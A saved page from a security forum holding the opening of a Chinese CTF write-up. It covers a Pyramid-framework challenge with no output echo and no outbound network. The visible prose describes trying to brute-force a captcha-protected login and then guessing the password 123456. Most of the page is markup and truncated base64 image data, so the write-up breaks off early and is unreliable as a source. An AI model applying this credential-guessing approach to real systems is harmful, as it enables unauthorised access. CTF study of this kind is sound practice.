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
|
|||
|
|
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kn{color:#204a87;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nc{color:#000000}.highlight .nd{color:#5c35cc;font-weight:bold}.highlight .nf{color:#000000}.highlight .nl{color:#f57900}.highlight .nn{color:#000000}.highlight .mf{color:#0000cf;font-weight:bold}.highlight .mh{color:#0000cf;font-weight:bold}.highlight .mi{color:#0000cf;font-weight:bold}.highlight .sc{color:#4e9a06}</style>
|
|||
|
|
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<!--[if !IE]> -->
|
|||
|
|
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}@media screen and (max-width:768px){}@keyframes image-loading-rotate{from{transform:rotate(360deg)}to{transform:rotate(0deg)}}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAADDUExURUxpcVVVVUNDVT5CTz1BUEBVVT1BUD1BTz5CTz5GT0BDUVVVVT5CTz5BUj1CTz5BT05OYj1CUD5GVUJCUj5CUD5BTz5BT0lJbT5CUEJCVT9DUUBHVT5CUD5CTz9CUD5BTz1BTz5CUEREUz5CUD5BUD5DTz5CUD5BT0BDUT5CTz1CUD5EUUBgYEBDUT5CUT1CTz1BUD5BUD9DUT1CT0REVT5BUENDUT1BUEBGUz1BUD9DT0FBUz1CTz5BTz1CUD1BUD1BT5JdbS4AAABAdFJOUwAJKr76DPbywR1MBuRO5fsNsyEfvdtKB4MbfiTa+FnegYwitbBXfPdYrt0pCEiL9XmsRdgeVhO8KI2KK45a2b/ePQx7AAAAwUlEQVQ4y4XTxw7CQAwE0A2E0BN67733Xv3/X4U0kYgimKxP9vgdfNhVildaBVfmpQGPaPD+7mjAW74g5q8Ewqd4QHy1T+JCm4IdsqswsEUUchhYHxCFhYENkpYw0MCFEZuCJYKuMDB1LzQZsPLehX/BCONEGCiWcWGKghKmlTAwwDA3GbByGArCQA39UBiYLfwX/gD3mdyEgSy6i8nAuIfuLAx00ByFgbaB5hT3VdUDmk8mfc0fa9Y1oKLZKyNo+QEJQV3gLnHrKwAAAABJRU5ErkJggg==" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/16631?time__1311=Gui%3DYK7K0KGKiKDsD7%2B50%3DEnYZzppphqdx"><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"></head>
|
|||
|
|
<body>
|
|||
|
|
<div class="navbar navbar-default">
|
|||
|
|
<div class=navbar-inner>
|
|||
|
|
<div class=container style=text-align:center;position:relative>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
|
|||
|
|
<![endif]-->
|
|||
|
|
<div class=brand-box>
|
|||
|
|
<a class=brand href=https://xz.aliyun.com/tab/1></a>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F16631&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
|
|||
|
|
登录</a>
|
|||
|
|
|
|||
|
|
<div class="nav-collapse collapse">
|
|||
|
|
<div class="search d1 text-right">
|
|||
|
|
<form action=/search>
|
|||
|
|
<input type=text placeholder=搜索 name=keyword value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div id=Wrapper class=container>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class=row2>
|
|||
|
|
<div class=span10>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box content" width="1200px !important" style=width:1200px>
|
|||
|
|
|
|||
|
|
<div class=box-container>
|
|||
|
|
<div class=main-topic>
|
|||
|
|
<div class="clearfix user-info topic-list">
|
|||
|
|
<p><span class=content-title>pyramid 框架无回显挖掘</span>
|
|||
|
|
</p>
|
|||
|
|
<div class=topic-info>
|
|||
|
|
<span class=info-left>
|
|||
|
|
<a href=https://xz.aliyun.com/u/94613>
|
|||
|
|
<span class="username cell"> 1341025112991831</span></a> <span class=i-seprator> / </span>
|
|||
|
|
<span> 2024-12-08 16:04:25</span><span class=i-seprator> / </span>
|
|||
|
|
|
|||
|
|
<span>发表于四川 / </span>
|
|||
|
|
|
|||
|
|
<span>浏览数 178</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=content-node>
|
|||
|
|
|
|||
|
|
<span class="label label-default label-node-first">
|
|||
|
|
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
|
|||
|
|
<span class="label label-default">
|
|||
|
|
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
|
|||
|
|
顶(0)</a>
|
|||
|
|
<a class="vote vote-down" href=javascript:void(0)>
|
|||
|
|
踩(0)</a></span>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<hr>
|
|||
|
|
<div id=topic_content class="topic-content markdown-body">
|
|||
|
|
<h1 id=toc-0>pyramid 框架无回显挖掘</h1>
|
|||
|
|
<h2 id=toc-1>前言</h2>
|
|||
|
|
<p>国城杯出了一道 pyramid 框架的题目,考点就是 pyramid 无回显,不出网的解决办法,当然最后也是能够出网的,这里从不出网的角度来进行学习</p>
|
|||
|
|
<h2 id=toc-2>解题</h2>
|
|||
|
|
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160420-076bd90e-b53b-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>叫用户登录</p>
|
|||
|
|
<p>爆破一手弱密码,但是有验证码,不会<br>
|
|||
|
|
最后提示了密码纯数字,猜的 123456</p>
|
|||
|
|
<p>然后直接进去了</p>
|
|||
|
|
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160417-0599e6c0-b53b-1.png><img src=data:image/png;base64,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
|
|||
|
|
<p>出题人玩一手高雅</p>
|
|||
|
|
